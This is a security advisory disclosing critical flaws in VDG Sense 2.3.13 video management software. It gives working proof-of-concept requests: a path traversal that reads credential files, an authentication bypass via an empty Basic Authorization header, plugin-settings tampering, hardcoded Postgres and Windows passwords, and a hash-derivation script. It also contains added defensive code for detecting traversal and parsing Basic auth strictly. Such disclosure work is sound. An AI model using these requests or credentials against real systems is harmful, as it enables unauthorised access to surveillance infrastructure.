SEC Consult Vulnerability Lab Security Advisory < 20141218-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: VDG Security SENSE (formerly DIVA)
vulnerable version: 2.3.13
fixed version: unknown - no vendor confirmation
impact: critical
homepage: https://vdgsecurity.com/
found: 2014-10-01
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"VDG Sense is our video management system (VMS). VDG Sense gives you control
of all live images and stored video data, in a user-friendly interface. Our
solution is based on an open platform, tailored to your specific needs and
requirements and ready to be integrated in any security solution."
Source: https://vdgsecurity.com/sense/
"DIVA is our former trademark, which we used to brand our video management
software and other VDG products. With the launch of our new trademark, VDG
Sense, we have rebranded the software to VDG Sense and promote it as such
from September 15, 2014. Other products, such as our servers, are available
under the label VDG."
Source: https://vdgsecurity.com/diva/
Business recommendation:
------------------------
Attackers are able to completely compromise the VDG SENSE server, as they can
gain access at the operating system level. The SENSE server can then be used as
an entry point into the target infrastructure (lateral movement, privilege
escalation).
It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.
Although the vendor does not respond to our mails any more, some
vulnerabilities seem to be fixed in the most recent version of SENSE (2.3.15).
It is assumed that further critical vulnerabilities exist.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated local file disclosure
Unauthenticated users can read arbitrary files from the filesystem with the
privileges of the "SYSTEM" operating system user. These files include
configuration files containing sensitive information such as clear text
passwords/password hashes which can be used in further attacks.
2) Authentication bypass / Clear text password disclosure
Some parts of the DIVA application are vulnerable to authentication bypass. This
allows attackers to update the DIVA plugin configuration. Furthermore, DIVA plugin
configurations can be read. This configuration includes clear text DIVA
administrator credentials, as DIVA plugins require access to such an account
for operation.
3) Insecure service configuration / Hardcoded default credentials - Postgres
The PostgreSQL database is offered via the network (TCP port 5432) and can be
accessed remotely using hardcoded credentials which can't be changed.
4) Hardcoded default credentials - Windows Users
Several local Windows users are created in the course of the DIVA setup. These
are used to run some of the DIVA services. These users can be used to log on to the
server running DIVA.
5) Critical information disclosure / User database leakage
After authentication with the DIVA (fat) client via the proprietary protocol
(TCP port 51410) the server returns the contents of the user database
to the client. This works regardless of whether the user has administrator
rights or not.
The user database (users.ini) contains all users and their password hashes.
This information is sufficient to log in as another user. An attacker does not
require knowledge about plain text passwords.
6) Use of plain text protocols
All DIVA communication transport channels (e.g. via TCP ports 80 and 51410) lack
encryption.
7) Buffer overflow vulnerabilities
The DIVA web service API (/webservice) is vulnerable to a stack based buffer
overflow when processing "AuthenticateUser" requests. Both the "user" and the
"password" parameter are vulnerable.
None of the DIVA modules are ASLR-enabled. An exploit that uses ROP to bypass
DEP has been implemented.
Proof of concept:
-----------------
1) Unauthenticated local file disclosure
Arbitrary files can be downloaded because of vulnerabilities in the proprietary
web server implementation. An example for x64 hosts:
http://<host>/images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini
Interesting DIVA-specific files:
config/systemprofile/AppData/Roaming/Diva/Settings/users.ini (DIVA user database)
config/systemprofile/AppData/Roaming/Diva/DivaManager/DivaManager.ini (contains DIVA
"master user")
config/systemprofile/AppData/Roaming/Diva/DivaManager/Plugins/ (DIVA plugin
configurations)
[...]
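The defensive counterpart to this finding, added here as an example and not part of the original advisory or of the vendor's code: a request-path resolver that refuses any ".." segment instead of trying to normalise it away, plus a scan over access-log lines that flags such requests. The document root, the Common Log Format layout and the log lines are constructed for the example; only the users.ini path is taken from the advisory.

```python
#!/usr/bin/env python3
"""Refuse request paths that try to escape the document root, and flag such
requests in access logs. Added example; DOCROOT, the log format and the
sample log lines are constructed, not taken from the product."""
import posixpath
import re
from urllib.parse import unquote

DOCROOT = "/srv/diva/htdocs"  # hypothetical document root

def path_segments(request_path):
    """Percent-decode a URL path (twice, so double-encoded '%252e' is also
    caught), treat backslashes as separators, drop the query string, and
    split into segments without empty or '.' entries."""
    decoded = unquote(unquote(request_path)).replace("\\", "/")
    return [s for s in decoded.split("?", 1)[0].split("/") if s not in ("", ".")]

def is_traversal(request_path):
    """True if any segment is '..', i.e. the request tries to walk upwards."""
    return any(s == ".." for s in path_segments(request_path))

def resolve_safely(request_path, docroot=DOCROOT):
    """Map a URL path under docroot, or return None for traversal attempts.
    Rejecting '..' outright keeps the decision simple and auditable; a
    normalising resolver is where the advisory's web server went wrong."""
    if is_traversal(request_path):
        return None
    return posixpath.join(docroot, *path_segments(request_path))

# Constructed access-log lines in Common Log Format (not from the product).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Oct/2014:10:46:01 +0000] "GET /images/logo.png HTTP/1.1" 200 812
10.0.0.9 - - [23/Oct/2014:10:46:28 +0000] "GET /images/../../../../Windows/SysWOW64/config/systemprofile/AppData/Roaming/Diva/Settings/users.ini HTTP/1.1" 200 1179
10.0.0.9 - - [23/Oct/2014:10:47:02 +0000] "GET /images/%2e%2e/%2e%2e/Windows/win.ini HTTP/1.1" 200 92
10.0.0.5 - - [23/Oct/2014:10:48:10 +0000] "GET /plugins/?sessionkey= HTTP/1.1" 200 410
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def find_traversal_requests(log_text):
    """Return (ip, path, status) for every logged request containing a '..'
    segment. A 200 status on such a request is the strongest signal that
    the server actually served a file outside its document root."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal(m.group("path")):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits

if __name__ == "__main__":
    for ip, path, status in find_traversal_requests(SAMPLE_LOG):
        print(f"{ip} {status} {path}")
```

Because the product runs on Windows, backslashes are treated as separators before the check; the double decode is deliberate so that an encoded-then-encoded sequence cannot slip past the scan.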
2) Authentication bypass / Clear text password disclosure
Authentication for parts of the application can be bypassed by sending the HTTP
Authorization header containing a colon ":".
GET /plugins/divacal/getsettings?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==
The response contains the plugin configuration for "divacal":
HTTP/1.1 200 OK
Date: Thu, 23 Okt 2014 10:46:28 GMT
Server: Diva HTTP Plugin 2.0
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: application/xml; charset=UTF-8
Content-Length: 1179
<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="../../xml/settings.xsl" ?>
<settings>
<name>DivaCal settings</name>
<group>
<id>0</id>
<name>DIVA Connection</name>
<singleinstance>yes</singleinstance>
<showbuttons>yes</showbuttons>
<subgroup>
[...]
<setting>
<id>1</id>
<name>DIVAUsername</name>
<type>string</type>
<value>Administrator</value>
<default>Administrator</default>
<help>The username used to login to to the DIVA management server.</help>
</setting>
<setting>
<id>2</id>
<name>DIVAPassword</name>
<type>password</type>
<value>!DVadmin</value>
<default>!DVadmin</default>
<help>The password required to login to the DIVA management server.</help>
</setting>
</subgroup>
</group>
</settings>
Other activated plugins can be queried via the following request:
GET /plugins/?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==
Plugin settings can be updated as follows:
POST /plugins/http/updatesettings?sessionkey= HTTP/1.1
Host: <host>
Authorization: Basic Og==
Content-Length: 29
groupid=0&DocumentRoot=htdocs
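The bypass above works because "Basic Og==" base64-decodes to the single byte ":", i.e. an empty user name and an empty password. The following strict Basic-auth parser, added here as an example and not part of the advisory or of the product, rejects exactly that class of header: malformed base64, a missing colon, or an empty user or password field all fail closed before any credential lookup happens. The credential store, user name and hashing scheme in it are constructed for the example (the product's own scheme is described under finding 5).

```python
#!/usr/bin/env python3
"""Strict parsing of the HTTP Basic Authorization header. Added example;
USERS and its SHA-256 scheme are constructed, not the product's."""
import base64
import binascii
import hashlib
import hmac

# Constructed credential store: user name -> SHA-256 hex digest of password.
USERS = {"operator": hashlib.sha256(b"correct horse").hexdigest()}

def encode_basic(user, password):
    """Build an Authorization header value the way a client would."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token

def parse_basic_auth(header_value):
    """Return (user, password) from an Authorization header value, or None
    if the header is malformed or either field is empty."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        user, sep, password = raw.partition(b":")
        # 'Og==' (just ':'), 'user' alone and 'user:' are all rejected here.
        if not sep or not user or not password:
            return None
        return user.decode("utf-8"), password.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None

def authenticate(header_value):
    """True only for a well-formed header carrying a known user's password."""
    creds = parse_basic_auth(header_value)
    if creds is None:
        return False
    user, password = creds
    expected = USERS.get(user)
    if expected is None:
        return False
    got = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(got, expected)  # constant-time comparison

if __name__ == "__main__":
    print("Og== accepted:", authenticate("Basic Og=="))
    print("operator accepted:", authenticate(encode_basic("operator", "correct horse")))
```

The check for an empty field sits in the parser rather than in the lookup, so no later code path can treat "no user" as "any user".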
3) Insecure service configuration / Hardcoded default credentials - Postgres
The Postgres root user is as follows:
Username: root
Password: ArpaRomaWi
4) Hardcoded default credentials - Windows Users
The created Windows users are as follows:
Username: postgres
Password: !DVService
Username: NTP
Password: !DVService
5) Critical information disclosure / User database leakage
Below is an excerpt from the DIVA protocol communication (TCP port 51410):
00000000 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 H....... ........ <- SERVER
00000010 00 00 00 00 0d 00 00 20 01 00 02 20 03 00 00 20 ....... ... ...
00000020 06 00 11 00 32 2e 33 2e 31 33 00 00 02 00 00 20 ....2.3. 13.....
00000030 01 00 02 40 04 00 00 00 04 00 00 20 06 00 11 00 ...@.... ... ....
00000040 44 69 76 61 20 73 65 72 76 65 72 00 Diva ser ver.
00000000 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ <- CLIENT
00000010 00 00 00 00 29 00 00 20 c9 00 02 40 05 00 00 20 ....).. ...@...
Note: client sends passwordHash and digestHash
00000020 f6 01 01 40 61 64 6d 69 6e 69 73 74 72 61 74 6f ...@admi nistrato
00000030 72 00 00 00 09 00 00 20 f7 01 01 40 49 41 68 6b r...... ...@IAhk
00000040 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 6b Cr3ahzY9 gSWsV73k
00000050 41 42 32 64 51 79 38 3d 00 00 00 00 0a 00 00 20 AB2dQy8= .......
00000060 fa 01 01 40 35 34 38 31 35 36 32 31 38 64 33 65 ...@5481 56218d3e
00000070 31 63 35 35 66 63 30 30 35 65 38 32 61 32 32 30 1c55fc00 5e82a220
00000080 61 34 63 30 00 00 00 00 02 00 00 20 05 00 11 40 a4c0.... ... ...@
00000090 02 00 00 00 03 00 00 20 0b 00 11 40 00 00 00 00 ....... ...@....
000000A0 00 00 00 00 02 00 00 20 0f 00 11 40 00 00 00 00 ....... ...@....
000000B0 02 00 00 20 02 00 11 40 00 00 00 00 ... ...@ ....
0000004C 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0....... ........ <- SERVER
0000005C 00 00 00 00 07 00 00 20 ca 00 02 40 02 00 00 20 ....... ...@...
0000006C f5 01 01 40 01 00 00 00 02 00 00 20 02 00 11 40 ...@.... ... ...@
0000007C 01 00 00 00 ....
000000BC 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 P....... ........ <- CLIENT
000000CC 00 00 00 00 0f 00 00 20 01 00 1c 40 0b 00 00 20 ....... ...@...
000000DC 02 00 1c 40 47 45 54 20 2f 75 73 65 72 6d 61 6e ...@GET /userman
000000EC 61 67 65 6d 65 6e 74 2f 6f 73 64 73 74 79 6c 65 agement/ osdstyle
000000FC 73 20 44 49 56 41 2f 31 2e 30 00 00 01 00 00 20 s DIVA/1 .0.....
0000010C 03 00 1c 40 ...@
00000080 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........ <- SERVER
00000090 00 00 00 00 04 00 00 20 07 01 11 40 02 00 00 20 ....... ...@...
000000A0 06 00 11 00 00 00 00 00 24 00 00 00 00 00 00 00 ........ $.......
[...]
00000200 9c 02 01 40 02 00 00 20 06 00 11 00 0d 0a 00 00 ...@... ........
00000210 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
00000220 00 00 00 00 2a 00 00 20 f4 01 01 40 28 00 00 20 ....*.. ...@(..
00000230 06 00 11 00 5b 61 64 6d 69 6e 69 73 74 72 61 74 ....[adm inistrat -----
00000240 6f 72 5d 0d 0a 61 64 6d 69 6e 72 69 67 68 74 73 or]..adm inrights |
00000250 3d 31 0d 0a 61 6e 64 72 6f 69 64 3d 0d 0a 64 69 =1..andr oid=..di |
00000260 67 65 73 74 48 61 73 68 3d 35 34 38 31 35 36 32 gestHash =5481562 |
00000270 31 38 64 33 65 31 63 35 35 66 63 30 30 35 65 38 18d3e1c5 5fc005e8 |
00000280 32 61 32 32 30 61 34 63 30 0d 0a 65 6d 61 69 6c 2a220a4c 0..email | <- DIVA user database
00000290 3d 0d 0a 66 75 6c 6c 6e 61 6d 65 3d 0d 0a 69 6f =..fulln ame=..io |
000002A0 73 3d 0d 0a 70 61 73 73 77 6f 72 64 3d 49 41 68 s=..pass word=IAh |
000002B0 6b 43 72 33 61 68 7a 59 39 67 53 57 73 56 37 33 kCr3ahzY 9gSWsV73 |
000002C0 6b 41 42 32 64 51 79 38 3d 0d 0a 0d 0a 00 00 00 kAB2dQy8 =....... -----
000002D0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 $....... ........
For the sake of completeness the password hashing scheme has been reverse
engineered. As both hashes can be used for authentication directly, brute
force attacks against password hashes are not required.
#!/usr/bin/env python3
import hashlib
from base64 import b64encode

user = 'administrator'
password = '!DVadmin'

# digestHash: MD5 over "user:DIVA:password", hex-encoded and upper-cased
digestHash = hashlib.md5((user + ":DIVA:" + password).encode()).hexdigest().upper()
# passwordHash: base64 of SHA-1 applied twice to the password (unsalted)
passwordHash = b64encode(hashlib.sha1(hashlib.sha1(password.encode()).digest()).digest()).decode()

print('digestHash', digestHash)
print('passwordHash', passwordHash)
6) Use of plain text protocols
No proof of concept necessary.
7) Buffer overflow vulnerabilities
Detailed proof of concept exploits have been removed for this vulnerability.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in 2.3.13, which was the most
recent version at the time of discovery.
Vendor contact timeline:
------------------------
2014-10-24: Sending responsible disclosure policy and requesting encryption
keys.
2014-10-28: Vendor responds, provides encryption keys.
2014-10-29: Sending advisory and proof of concept exploit via encrypted
channel.
2014-10-29: Vendor confirms receipt of advisory.
2014-11-10: Requesting status update.
2014-11-17: Vendor states that team is "very well on track to solve the
issues".
2014-11-18: Clarifying criticality of vulnerabilities and viability of attack,
even in closed networks; referring to Shodan search results.
2014-12-10: Requesting status update. No reply.
2014-12-18: SEC Consult releases security advisory.
Solution:
---------
It seems some of the vulnerabilities are fixed in the most recent version of
SENSE (2.3.15). The vendor stopped responding to our emails, so we do not know
which vulnerabilities were actually fixed.
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Stefan Viehböck / @2014